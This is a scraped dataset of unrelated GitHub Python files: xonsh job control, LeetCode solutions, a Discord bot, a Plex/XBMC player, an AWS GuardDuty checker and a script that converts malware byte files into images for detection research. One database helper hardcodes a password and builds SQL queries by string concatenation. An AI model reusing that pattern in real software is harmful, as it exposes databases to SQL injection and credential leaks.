builtins.__xonsh_all_jobs__.items():\n obj = job['obj']\n if obj.poll() is not None:\n to_remove.add(num)\n for i in to_remove:\n del builtins.__xonsh_all_jobs__[i]\n if builtins.__xonsh_active_job__ == i:\n builtins.__xonsh_active_job__ = None\n if builtins.__xonsh_active_job__ is None:\n _reactivate_job()\n\n\ndef _reactivate_job():\n if len(builtins.__xonsh_all_jobs__) == 0:\n return\n builtins.__xonsh_active_job__ = max(builtins.__xonsh_all_jobs__.items(),\n key=lambda x: x[1]['started'])[0]\n\n\n\ndef print_one_job(num):\n \"\"\"Print a line describing job number ``num``.\"\"\"\n try:\n job = builtins.__xonsh_all_jobs__[num]\n except KeyError:\n return\n act = '*' if num == builtins.__xonsh_active_job__ else ' '\n status = job['status']\n cmd = [' '.join(i) if isinstance(i, list) else i for i in job['cmds']]\n cmd = ' '.join(cmd)\n pid = job['pids'][-1]\n bg = ' &' if job['bg'] else ''\n print('{}[{}] {}: {}{} ({})'.format(act, num, status, cmd, bg, pid))\n\n\ndef get_next_job_number():\n \"\"\"Get the lowest available unique job number (for the next job created).\n \"\"\"\n _clear_dead_jobs()\n i = 1\n while i in builtins.__xonsh_all_jobs__:\n i += 1\n return i\n\n\ndef add_job(info):\n \"\"\"\n Add a new job to the jobs dictionary.\n \"\"\"\n info['started'] = time.time()\n info['status'] = 'running'\n _set_pgrp(info)\n num = get_next_job_number()\n builtins.__xonsh_all_jobs__[num] = info\n builtins.__xonsh_active_job__ = num\n if info['bg']:\n print_one_job(num)\n\n\ndef _default_sigint_handler(num, frame):\n raise KeyboardInterrupt\n\n\ndef kill_all_jobs():\n \"\"\"\n Send SIGKILL to all child processes (called when exiting xonsh).\n \"\"\"\n _clear_dead_jobs()\n for job in builtins.__xonsh_all_jobs__.values():\n _kill(job['obj'])\n\n\ndef jobs(args, stdin=None):\n \"\"\"\n xonsh command: jobs\n\n Display a list of all current jobs.\n \"\"\"\n _clear_dead_jobs()\n for j in sorted(builtins.__xonsh_all_jobs__):\n print_one_job(j)\n return None, None\n\n\ndef fg(args, stdin=None):\n \"\"\"\n xonsh command: fg\n\n Bring the currently active job to the foreground, or, if a single number is\n given as an argument, bring that job to the foreground.\n \"\"\"\n _clear_dead_jobs()\n if len(args) == 0:\n # start active job in foreground\n act = builtins.__xonsh_active_job__\n if act is None:\n return '', 'Cannot bring nonexistent job to foreground.\\n'\n elif len(args) == 1:\n try:\n act = int(args[0])\n except ValueError:\n return '', 'Invalid job: {}\\n'.format(args[0])\n if act not in builtins.__xonsh_all_jobs__:\n return '', 'Invalid job: {}\\n'.format(args[0])\n else:\n return '', 'fg expects 0 or 1 arguments, not {}\\n'.format(len(args))\n builtins.__xonsh_active_job__ = act\n job = builtins.__xonsh_all_jobs__[act]\n job['bg'] = False\n job['status'] = 'running'\n print_one_job(act)\n wait_for_active_job(_continue(job['obj']))\n\n\ndef bg(args, stdin=None):\n \"\"\"\n xonsh command: bg\n\n Resume execution of the currently active job in the background, or, if a\n single number is given as an argument, resume that job in the background.\n \"\"\"\n _clear_dead_jobs()\n if len(args) == 0:\n # start active job in foreground\n act = builtins.__xonsh_active_job__\n if act is None:\n return '', 'Cannot send nonexistent job to background.\\n'\n elif len(args) == 1:\n try:\n act = int(args[0])\n except ValueError:\n return '', 'Invalid job: {}\\n'.format(args[0])\n if act not in builtins.__xonsh_all_jobs__:\n return '', 'Invalid job: {}\\n'.format(args[0])\n else:\n return '', 'bg expects 0 or 1 arguments, not {}\\n'.format(len(args))\n builtins.__xonsh_active_job__ = act\n job = builtins.__xonsh_all_jobs__[act]\n job['bg'] = True\n job['status'] = 'running'\n print_one_job(act)\n wait_for_active_job(_continue(job['obj']))\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/donnemartin_gitsome/gitsome-master/xonsh/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":7661,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"70751729972","text":"class Solution:\n def findRedundantConnection(self, edges: List[List[int]]) -> List[int]:\n # union find\n # if two nodes have the same parent, they are alr connected and the connection is redundant\n \n parent = [i for i in range(len(edges))]\n degree = [1]*len(edges)\n res=[]\n \n def find(p):\n while p!=parent[p]:\n p=parent[p]\n return p\n \n def union(n1,n2):\n p1,p2=find(n1),find(n2)\n if p1==p2:\n return 1\n elif degree[p1]>degree[p2]:\n degree[p1]+=degree[p2]\n parent[p2]=p1\n else:\n degree[p2]+=degree[p1]\n parent[p1]=p2\n return 0\n for n1, n2 in edges:\n if union(n1-1,n2-1):\n res=[n1,n2]\n return res","repo_name":"HaojunYuan/MyLeetCode","sub_path":"0684-redundant-connection/0684-redundant-connection.py","file_name":"0684-redundant-connection.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18205624492","text":"class Solution:\n def largestDivisibleSubset(self, nums: List[int]) -> List[int]:\n n = len(nums)\n ans = []\n count = [1] * n\n prevIndex = [-1] * n\n maxCount = 0\n index = -1\n\n nums.sort()\n\n for i, num in enumerate(nums):\n for j in reversed(range(i)):\n if num % nums[j] == 0 and count[i] < count[j] + 1:\n count[i] = count[j] + 1\n prevIndex[i] = j\n if count[i] > maxCount:\n maxCount = count[i]\n index = i\n\n while index != -1:\n ans.append(nums[index])\n index = prevIndex[index]\n\n return ans\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/0368. Largest Divisible Subset/0368.py","file_name":"0368.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"21042380045","text":"import discord\nimport discord.message\nfrom discord.ext import commands\nfrom discord import app_commands\nfrom SearchTools import *\nfrom ExtractTools import *\nfrom EctTools import *\n\n\nclass TroubleFinder(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n \n @app_commands.command(name='사사게', description='인벤 사사게 수록 정보를 알려줍니다.')\n @app_commands.describe(char_name = '닉네임')\n async def trouble_info(self, interaction: discord.Interaction, char_name: str):\n \"\"\"\n char_name : 캐릭터 이름\n \n return:\n 최근 1만개 게시글 중 올라온 사건사고 게시글 이름과 하이퍼링크 \n \"\"\"\n \n print(interaction.command.name, toNowTime())\n \n trouble_search = TroubleSearch(char_name)\n trouble_post, trouble_title = trouble_search.searchTrouble()\n \n embed = discord.Embed(title=f':exclamation: 사사게 검색 결과 - {char_name}', \n description='''부캐명이 포함되지 않을 수 있다��� 점 참고 부탁드립니다!\n 최근 1만개의 게시글 내에서 검색합니다.''')\n\n if len(trouble_post) == 0 and len(trouble_title) == 0:\n embed.add_field(name='', value='**검색 결과가 없습니다!**')\n await interaction.response.send_message(embed=embed)\n return\n \n # 인덱스와 검색 결과 같이 출력\n for idx, (url, title) in enumerate(zip(trouble_post, trouble_title)):\n idx += 1\n embed.add_field(name='', value=f'{idx}. [{title}](<{url}>)', inline=False)\n \n await interaction.response.send_message(embed=embed)\n \nasync def setup(bot: commands.Bot):\n await bot.add_cog(\n TroubleFinder(bot)\n )","repo_name":"KimChanw/LoVis_LostarkDiscordBot","sub_path":"Cogs/TroubleFinder.py","file_name":"TroubleFinder.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"45492104775","text":"from dotenv import load_dotenv\n\nload_dotenv()\n\nfrom os import getenv\n\n\ndef smart_bool(val: str) -> bool:\n if val.strip().lower() in [\"true\", \"yes\", \"1\"]:\n return True\n if val.strip().lower() in [\"false\", \"no\", \"0\", \"\"]:\n return False\n raise ValueError(f\"Config value of {val} could not be coerced into bool\")\n\n\nclass BaseConfig:\n def __init__(self):\n for env_variable, value_class in self.__class__.__dict__[\n \"__annotations__\"\n ].items():\n env_value = getenv(env_variable.upper())\n if env_value:\n parsed_value = value_class(env_value)\n else:\n parsed_value = getattr(self, env_variable)\n setattr(self, env_variable, parsed_value)\n\n\ndef write_env(config):\n with open(\".env\", \"w\") as f:\n for env_var in config.__class__.__dict__[\"__annotations__\"]:\n val = getattr(config, env_var)\n f.write(f\"{env_var.upper()}={val}\\n\")\n","repo_name":"voglster/sparkles","sub_path":"sparkles/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"2712009975","text":"from transformers import BertConfig\n\n\nclass KebioConfig(BertConfig):\n \"\"\"Configuration for `KebioModel`.\"\"\"\n\n def __init__(self,\n vocab_size,\n num_entities,\n max_mentions=15,\n max_candidate_entities=100,\n hidden_size=768,\n entity_size=50,\n num_hidden_layers=12,\n num_context_layers=8,\n num_attention_heads=12,\n intermediate_size=3072,\n hidden_act=\"gelu\",\n hidden_dropout_prob=0.1,\n attention_probs_dropout_prob=0.1,\n max_position_embeddings=512,\n type_vocab_size=16,\n initializer_range=0.02, **kwargs):\n super(KebioConfig, self).__init__(vocab_size=vocab_size,\n hidden_size=hidden_size,\n num_hidden_layers=num_hidden_layers,\n num_attention_heads=num_attention_heads,\n intermediate_size=intermediate_size,\n hidden_act=hidden_act,\n hidden_dropout_prob=hidden_dropout_prob,\n attention_probs_dropout_prob=attention_probs_dropout_prob,\n max_position_embeddings=max_position_embeddings,\n type_vocab_size=type_vocab_size,\n initializer_range=initializer_range, **kwargs)\n self.num_context_layers = num_context_layers\n self.entity_size = entity_size\n self.num_entities = num_entities\n self.max_mentions = max_mentions\n self.max_candidate_entities = max_candidate_entities\n","repo_name":"GanjinZero/KeBioLM","sub_path":"configuration_kebio.py","file_name":"configuration_kebio.py","file_ext":"py","file_size_in_byte":1777,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"21"} +{"seq_id":"41609498741","text":"import psycopg2\n\n\ndef connect_to_db():\n try:\n connection = psycopg2.connect(user=\"postgres\",\n password=\"testingPassword\",\n host=\"127.0.0.1\",\n port=\"5432\",\n database=\"camaradb\")\n return connection\n except (Exception, psycopg2.Error) as error:\n print(\"Error while connecting to PostgreSQL\", error)\n\n\nconn = connect_to_db()\n\n\ndef insert_remuneracao(remuneracao, conn):\n cursor = conn.cursor()\n cursor.execute('INSERT INTO remuneracoes (vereador, total_vantagens, descontos_totais, valor_liquido, data) VALUES (' + \"'\" + remuneracao.vereador + \"', \" + remuneracao.total_vantagens + ', ' +\n remuneracao.descontos_totais + ', ' + remuneracao.valor_liquido + \", '\" + remuneracao.data + \"');\")\n conn.commit()\n\n\ndef insert_to_db(insert_string):\n cursor = conn.cursor()\n cursor.execute(insert_string)\n conn.commit()\n\n\ndef select_from_db(select_query):\n cursor = conn.cursor()\n cursor.execute(select_query)\n data = cursor.fetchall()\n cursor.close()\n return data\n\n\ndef update_to_db(update_query):\n cursor = conn.cursor()\n cursor.execute(update_query)\n conn.commit()\n cursor.close()\n","repo_name":"caio-tenorio/csv_extractor","sub_path":"database/database_connection.py","file_name":"database_connection.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9453249503","text":"class Question:\n def __init__(self, prompt, answer):\n self.prompt = prompt\n self.answer = answer\n\n\nquestion_prompts = [\n \"What color are apples?\\n(a) red\\green\\n(b) purple\\pink\\n(c) orange\\n\",\n \"Where do kids come from?\\n(a) Santa\\n(b) Stork\\n(c) The Domino's delivery guy\\n\",\n \"What time is midnight?\\n(a) 1am\\n(b) 12pm\\n(c) 12am\\n\"\n ]\n\nquestions = [\n Question(question_prompts[0], \"a\"),\n Question(question_prompts[1], \"b\"),\n Question(question_prompts[2], \"c\")\n\n ]\n\ndef run_test(questions):\n points = 0\n for question in questions:\n answer = input(question.prompt)\n if answer == question.answer:\n points += 1\n\n return points","repo_name":"PapaGotBeef/3pythonclasses","sub_path":"pythonProject2/Quiz.py","file_name":"Quiz.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20427096437","text":"# Escreva um programa que leia a velocidade de um carro. Se ele ultrapassar 80km/h, mostre uma mensagem dizendo que ele foi multado. A multa vai custar 7,00 por cada km acima do limite.\n\nprint('\\nVerificador de Velocidade.')\nvelocidade = input('\\nInforme a velocidade: ').strip()\nwhile velocidade.isnumeric() == False or int(velocidade) == 0:\n velocidade = input(\n '\\nSó é permitido Numeros/Não permitido zero\\nInforme a velocidade: ').strip()\nvelocidade = float(velocidade)\nif velocidade > 80:\n print('\\nVelocidade Acima do permitido.\\nVocê foi MULTADO por exceder {:.0f} Km/h\\nValor da Multa: R$ {:.2f}'.format(\n (velocidade - 80), (velocidade - 80) * 7))\nelse:\n print('Parabéns. Você está dentro da velocidade permitida para esta via.')\n","repo_name":"Rodjfreitas/learning-python","sub_path":"Exercicios/ex0029.py","file_name":"ex0029.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"11081208006","text":"#该题考虑的是大数问题,全部放入到list中,就没有意义了。\n#我用大数问题的解法完成\n\nclass Solution:\n def printNumbers(self, n: int) -> List[int]:\n self.result = []\n if n<=0:\n return []\n s = ['0' for i in range(n)]\n self.helper(s,0,n)\n return self.result[1:]\n\n def helper(self,s,index,n):\n if index==n:\n self.result.append(int(''.join(s)))\n return \n for i in range(10):\n s[index] = str(i)\n self.helper(s,index+1,n)","repo_name":"SummerRaining/offer_code_practice","sub_path":"17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29418270792","text":"import numpy as np\nfrom PIL import Image\nimport sys\nimport glob\nimport errno\nimport os \nresult=[]\ntemp1=np.zeros((256,256))\nimage = np.zeros((256,256))\ni,j,p=0,0,0\npath = \"C:/Users/admin/Project IAS/Module1/data1/\" ## Absolute path for the database.\ndirs = os.listdir( path ) ## gets all the directories in the given folder.\npath2 = \"C:/Users/admin/Project IAS/Module1/image256/\" ## Absolute path for storing 256x256 image.\npath3 = \"C:/Users/admin/Project IAS/Module1/image36/\" ## Absolute path for storing 36x36 image.\nfor fil in dirs:\n image = np.zeros((256,256))\n with open(path+fil, \"rb\") as f: ## read byte mode\n byte = f.read(1) ## reading 1 byte at a time. returns a byte object.\n i,j,p=0,0,0\n print(fil)\n #print (byte)\n while byte != b\"\": ## itereating till the end of the file\n # print (ord(byte),byte) ## ord gives ASCII value of that char.\n if(i<256):\n if(byte.decode(\"utf-8\")==' ' or byte.decode(\"utf-8\")=='\\r' or byte.decode(\"utf-8\")=='\\n' or byte.decode(\"utf-8\")=='?' ):\n byte = f.read(1)\n continue\n # image[i][p]=0\n #print (byte.decode(\"utf-8\"),int(byte.decode(\"utf-8\"),16),i)\n if(j>8):\n image[i][p]= int(byte.decode(\"utf-8\"),16) ## byte.decode gives the value of the byte object which is converted into hexa-decimal.\n p=p+1\n j=j+1\n if(p>255):\n p=0\n j=0\n i=i+1\n byte = f.read(1)\n a=np.matrix(image)\n # a=np.matrix(image)\n print (a)\n result.append(np.array_equal(temp1,a))\n temp1=a\n img = Image.fromarray(image, 'L') ## makes 2D array into an image. L-> The kind of pixel (8-bit pixel black and white)\n #img.show()\n img.save(path2+fil[0:-6]+\".bmp\")\n img = img.resize((36,36),Image.ANTIALIAS)\n img.save(path3+fil[0:-6]+\".bmp\")\n #img.show()\nprint (result)\n\n\n\n# with open('C:/Users/admin/Project IAS/data/sample/0fHVZKeTE6iRb1PIQ4au.bytes', 'r') as file1:\n# print(file1.read())\n# import pandas as pd\n# df = pd.read_csv(\"C:/Users/admin/Project IAS/data/sample/0fHVZKeTE6iRb1PIQ4au.bytes\")\n# print(df.drop([0]))\n# with open('C:/Users/admin/Project IAS/data/sample/0gDsIvrylX5fPbG7cSBn.bytes', 'r') as file2:\n# print(file2.read())\n'''\n#same.discard('\\n')\n\n# with open('some_output_file.txt', 'w') as file_out:\n# for line in same:\n# file_out.write(line)\n\nwith open(\"apt1/APT1/VirusShare_00dbb9e1c09dbdafb360f3163ba5a3de.json\", \"rb\") as f:\n byte = f.read(1)\n while byte:\n #print ord(byte)\n if(i<256):\n image[i][j]=ord(byte)\n j=j+1\n if(j>255):\n j=0\n i=i+1\n byte = f.read(1)\n\nprint(np.matrix(image))\nimg = Image.fromarray(image, 'L')\nimg.show()\nimg = img.resize((36,36),Image.ANTIALIAS)\nimg.show()\n\n'''\n","repo_name":"riak16/Malware-Detection-using-Deep-Learning","sub_path":"ias_full.py","file_name":"ias_full.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"21"} +{"seq_id":"39866644968","text":"import plexmyxbmc\nfrom plexmyxbmc import millis_to_time\nfrom plexmyxbmc.xbmc_rpc import InvalidRPCConnection\nimport plexapi.video as video\nfrom plexmyxbmc.log import get_logger\n\n\nclass PlayerType(object):\n def __init__(self, type):\n self._type = type\n\n @property\n def plex(self):\n if 'audio' == self._type:\n return 'music'\n return self._type\n\n @property\n def xbmc(self):\n if 'music' == self._type:\n return 'audio'\n return self._type\n\n def __eq__(self, other):\n if not isinstance(other, PlayerType):\n return False\n return self.plex == other.plex\n\n\nclass XBMC(object):\n def __init__(self, rpc):\n self._logger = get_logger(self.__class__.__name__)\n self._rpc = rpc\n if not self._rpc.verify():\n raise InvalidRPCConnection()\n\n @property\n def rpc(self):\n return self._rpc\n\n def get_player_properties(self, playerid):\n args = dict(playerid=int(playerid), properties=[\"time\", \"totaltime\", \"speed\", \"shuffled\"])\n resp = self._rpc.execute(\"Player.GetProperties\", args)\n properties = dict()\n try:\n properties['time'] = plexmyxbmc.time_to_millis(resp['time'])\n properties['duration'] = plexmyxbmc.time_to_millis(resp['totaltime'])\n properties['state'] = 'paused' if resp['speed'] is 0 else 'playing'\n properties['shuffle'] = '0' if resp.get('shuffled', False) is False else '1'\n except Exception:\n properties['time'] = 0\n properties['duration'] = 0\n properties['state'] = \"stopped\"\n properties['shuffle'] = '0'\n\n properties['volume'] = self.volume\n return properties\n\n def get_active_players(self):\n return self._rpc.execute('Player.GetActivePlayers', tuple())\n\n def play_media(self, url, offset=0):\n params = dict(\n item=dict(\n file=url,\n ),\n options=dict(\n resume=millis_to_time(offset)\n )\n )\n return self._rpc.execute('Player.Open', params)\n\n def stop(self):\n for player in self.get_active_players():\n playerid = int(player['playerid'])\n self._rpc.execute('Player.Stop', dict(playerid=playerid))\n\n @property\n def volume(self):\n args = dict(properties=['volume'])\n resp = self._rpc.execute('Application.GetProperties', args)\n return resp.get('volume', 100)\n\n @volume.setter\n def volume(self, val):\n val = int(val)\n args = dict(volume=val)\n self._rpc.execute('Application.SetVolume', args)\n\n def play_pause(self, state):\n assert isinstance(state, bool) is True, 'Expected Bool, got %s' % type(state)\n for player in self.get_active_players():\n playerid = int(player['playerid'])\n self._rpc.execute('Player.PlayPause', dict(playerid=playerid, play=state))\n\n def seek(self, seek_value=0):\n for player in self.get_active_players():\n playerid = int(player['playerid'])\n if isinstance(seek_value, int):\n seek_to = millis_to_time(seek_value)\n elif isinstance(seek_value, str):\n seek_to = seek_value\n else:\n raise ValueError('expected (int, str), found %s' % type(seek_value))\n params = dict(playerid=playerid, value=seek_to)\n self._logger.debug('Seek params %s', str(params))\n self._rpc.execute(\"Player.Seek\", params)\n\n def notify(self, title, msg, duration=5000):\n args = dict(title=title, message=msg, displaytime=duration)\n self._rpc.execute('GUI.ShowNotification', args)\n\n def __str__(self):\n return '{0} at {1}:{2}'.format(\n self.__class__.__name__,\n self._rpc.host,\n self._rpc.port\n )\n\n\nclass XBMCPlexPlayer(XBMC):\n def __init__(self, rpc, plex):\n super(XBMCPlexPlayer, self).__init__(rpc)\n self._plex = plex\n self._metadata = dict()\n\n @property\n def metadata(self):\n return self._metadata\n\n def step(self, plex_value):\n steps = dict(\n stepForward='smallforward',\n stepBack='smallbackward',\n skipNext='bigforward',\n skipPrevious='bigbackward'\n )\n value = steps[plex_value]\n self.seek(value)\n\n def navigate(self, plex_value):\n steps = dict(\n moveUp='Input.Up',\n moveDown='Input.Down',\n moveLeft='Input.Left',\n moveRight='Input.Right',\n select='Input.Select',\n home='Input.Home',\n back='Input.Back'\n )\n value = steps[plex_value]\n self._rpc.execute(value, dict())\n\n def get_timeline(self, playerid, playertype):\n timeline = dict(type=playertype.plex)\n vid = self.metadata.get('video', None)\n container_key = self.metadata.get('containerKey', None)\n \n if playerid > 0:\n prop = self.get_player_properties(playerid)\n timeline.update(prop)\n timeline['controllable'] = \"playPause,play,stop,skipPrevious,skipNext,volume,stepBack,stepForward,seekTo\"\n timeline['seekRange'] = '0-%d' % prop['duration']\n timeline['guid'] = ''\n timeline['machineIdentifier'] = self.metadata.get('machineIdentifier', '')\n\n if vid is not None:\n timeline['address'] = vid.server.address\n timeline['port'] = str(vid.server.port)\n timeline['protocol'] = 'http'\n timeline['key'] = vid.key\n timeline['ratingKey'] = vid.ratingKey\n timeline['subtitleStreamID'] = '-1'\n\n if container_key is not None:\n timeline['containerKey'] = container_key\n timeline['playQueueID'] = container_key.strip().split('/')[-1]\n else:\n if vid is not None:\n timeline['key'] = vid.key\n timeline['state'] = 'stopped'\n timeline['time'] = 0\n return timeline\n\n def get_players_state(self):\n state = dict()\n players = self.get_active_players()\n\n state['location'] = \"navigation\"\n index = 0\n for mediatype in ('audio', 'photo', 'video'):\n mediatype = PlayerType(mediatype)\n player = filter(lambda x: PlayerType(x['type']) == mediatype, players)\n if player:\n playerid = int(player[0]['playerid'])\n state['location'] = 'fullScreen' + mediatype.plex.capitalize()\n else:\n playerid = -1\n\n # hack to generate 'Timeline_', 'Timeline__' or 'Timeline___' to cheat dict2xml\n key = 'Timeline' + ('_' * index)\n state[key] = self.get_timeline(playerid, mediatype)\n state[key]['location'] = state['location']\n index += 1\n\n return state\n\n def play_video(self, video, offset=0):\n # gets a plexapi.video.Video object\n media_parts = [x for x in video.iter_parts()]\n if not media_parts:\n raise Exception(video)\n\n media_part = media_parts[0]\n cached_item = self._plex.storage_mgr.get_cached_item(video, media_part)\n if cached_item:\n self._logger.info('found cached media part %s', str(cached_item))\n else:\n self._logger.info('did not find media part in local cache, playing from remote server')\n\n if cached_item and cached_item.done is True:\n # assumes XBMC is running on the same host as this PMX\n # will implement this via the embedded HTTP server to allow\n # this feature to work with remote XBMC\n #url = 'file://{0}'.format(cached_item.filename)\n url = cached_item.filename\n self._logger.debug('cached media part is fully downloaded! using local file')\n else:\n url = self._plex.authenticated_url(media_part.key)\n self._logger.debug('Using remote file')\n \n self._logger.debug('playing url %s', url)\n self.play_media(url, offset)\n self._metadata['video'] = video\n self._metadata['part'] = media_part\n\n def play_key(self, key, offset=0):\n server = self._plex.server\n item = video.list_items(server, key, video.Episode.TYPE)\n if not item:\n raise Exception()\n\n item = item[0]\n self.play_video(item, offset)\n","repo_name":"goniz/plexmyxbmc","sub_path":"plexmyxbmc/xbmc.py","file_name":"xbmc.py","file_ext":"py","file_size_in_byte":8521,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"4121179929","text":"import keras\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras import layers\n\n# Very basic model\ndef customCNN(img_width, img_height, plot_summary=False):\n model = Sequential()\n model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(img_width, img_height, 3)))\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(64, (3, 3), activation='relu'))\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(128, (3, 3), activation='relu'))\n model.add(layers.Flatten())\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.Dense(8, activation='softmax'))\n if plot_summary:\n model.summary()\n\n return model\n\n\ndef customCNNv2(img_width, img_height, plot_summary=False):\n model = Sequential()\n\n\n# IDEAS:\n# Empezar con n_h, n_w grande para acabar con n_c grande? Demostrar que mas capas, mas accuracy.\n# Modelo con skip connections => modelo secuencial no vale supongo\n# conv 1x1 para reducir n_c\n# Prunar modelo al final. mecanismo iterativo q busque la mejor solucion\n","repo_name":"cesc47/Machine-Learning-for-Computer-Vision","sub_path":"week5/ourCNN.py","file_name":"ourCNN.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3026680885","text":"import threading\nfrom typing import Optional\n\nfrom pydantic import BaseModel\n\nfrom prowler.lib.logger import logger\nfrom prowler.lib.scan_filters.scan_filters import is_resource_filtered\nfrom prowler.providers.aws.aws_provider import generate_regional_clients\n\n\n################################ GuardDuty\nclass GuardDuty:\n def __init__(self, audit_info):\n self.service = \"guardduty\"\n self.session = audit_info.audit_session\n self.audited_account = audit_info.audited_account\n self.audit_resources = audit_info.audit_resources\n self.audited_partition = audit_info.audited_partition\n self.regional_clients = generate_regional_clients(self.service, audit_info)\n self.detectors = []\n self.__threading_call__(self.__list_detectors__)\n self.__get_detector__(self.regional_clients)\n self.__list_findings__(self.regional_clients)\n self.__list_tags_for_resource__()\n\n def __get_session__(self):\n return self.session\n\n def __threading_call__(self, call):\n threads = []\n for regional_client in self.regional_clients.values():\n threads.append(threading.Thread(target=call, args=(regional_client,)))\n for t in threads:\n t.start()\n for t in threads:\n t.join()\n\n def __list_detectors__(self, regional_client):\n logger.info(\"GuardDuty - listing detectors...\")\n try:\n list_detectors_paginator = regional_client.get_paginator(\"list_detectors\")\n for page in list_detectors_paginator.paginate():\n for detector in page[\"DetectorIds\"]:\n if not self.audit_resources or (\n is_resource_filtered(detector, self.audit_resources)\n ):\n arn = f\"arn:{self.audited_partition}:guardduty:{regional_client.region}:{self.audited_account}:detector/{detector}\"\n self.detectors.append(\n Detector(\n id=detector, arn=arn, region=regional_client.region\n )\n )\n except Exception as error:\n logger.error(\n f\"{regional_client.region} -- {error.__class__.__name__}[{error.__traceback__.tb_lineno}]: {error}\"\n )\n\n def __get_detector__(self, regional_clients):\n logger.info(\"GuardDuty - getting detector info...\")\n try:\n for detector in self.detectors:\n regional_client = regional_clients[detector.region]\n detector_info = regional_client.get_detector(DetectorId=detector.id)\n if \"Status\" in detector_info and detector_info[\"Status\"] == \"ENABLED\":\n detector.status = True\n\n except Exception as error:\n logger.error(\n f\"{regional_client.region} -- {error.__class__.__name__}[{error.__traceback__.tb_lineno}]: {error}\"\n )\n\n def __list_findings__(self, regional_clients):\n logger.info(\"GuardDuty - listing findings...\")\n try:\n for detector in self.detectors:\n regional_client = regional_clients[detector.region]\n list_findings_paginator = regional_client.get_paginator(\"list_findings\")\n for page in list_findings_paginator.paginate(\n DetectorId=detector.id,\n FindingCriteria={\n \"Criterion\": {\n \"severity\": {\n \"Eq\": [\n \"8\",\n ],\n },\n \"service.archived\": {\n \"Eq\": [\n \"false\",\n ],\n },\n }\n },\n ):\n for finding in page[\"FindingIds\"]:\n detector.findings.append(finding)\n\n except Exception as error:\n logger.error(\n f\"{regional_client.region} -- {error.__class__.__name__}[{error.__traceback__.tb_lineno}]: {error}\"\n )\n\n def __list_tags_for_resource__(self):\n logger.info(\"Guardduty - List Tags...\")\n try:\n for detector in self.detectors:\n regional_client = self.regional_clients[detector.region]\n response = regional_client.list_tags_for_resource(\n ResourceArn=detector.arn\n )[\"Tags\"]\n detector.tags = [response]\n except Exception as error:\n logger.error(\n f\"{regional_client.region} -- {error.__class__.__name__}[{error.__traceback__.tb_lineno}]: {error}\"\n )\n\n\nclass Detector(BaseModel):\n id: str\n arn: str\n region: str\n status: bool = None\n findings: list = []\n tags: Optional[list] = []\n","repo_name":"gopikrishna72/prowl","sub_path":"prowler/providers/aws/services/guardduty/guardduty_service.py","file_name":"guardduty_service.py","file_ext":"py","file_size_in_byte":4982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16070705906","text":"#!/usr/env\nfrom rosa_util import *\n#mer\n\ndef mer():\n\tl1 = []\n\tl2 = []\n\tl = []\n\tf = open('rosalind_mer.txt','r')\n\tn = int(f.readline().strip())\n\n\tfor i in f.readline().split():\n\t\tl1.append(int(i))\n\n\tm = int(f.readline().strip())\n\tfor i in f.readline().split():\n\t\tl2.append(int(i))\n\n\tfor i in range(n+m):\n\t\tif len(l1) == 0:\n\t\t\twriteResult(' '.join(str(x) for x in l2))\n\t\t\treturn\n\t\t\t#for x in l2:\n\t\t\t#\tl.append(x)\n\t\t\t#\treturn l\n\t\telif len(l2) == 0:\n\t\t\twriteResult(' '.join(str(x) for x in l1))\n\t\t\treturn\n\t\t\t#for x in l1:\n\t\t\t#\tl.append(x)\n\t\t\t#\treturn l\n\t\tif l1[0] == min(l1[0],l2[0]):\n\t\t\twriteResult('mer',str(l1.pop(0))+' ')\n\t\t\t#l.append(l1.pop(0))\n\t\tif l2[0] == min(l1[0],l2[0]):\n\t\t\twriteResult('mer',str(l1.pop(0))+' ')\n\t\t\t#l.append(l2.pop(0))\n\n\t#return l\nmer()\n","repo_name":"ccneko/Rosalind","sub_path":"mer.py","file_name":"mer.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31354000173","text":"import unittest\nimport sys\n\nmodule = sys.argv[-1].split(\".py\")[0]\n\nclass PublicTests(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n global unicos_em_comum\n undertest = __import__(module)\n unicos_em_comum = getattr(undertest, 'unicos_em_comum', None)\n\n def test_exemplo1(self):\n l1 = [ 'A', 'A', 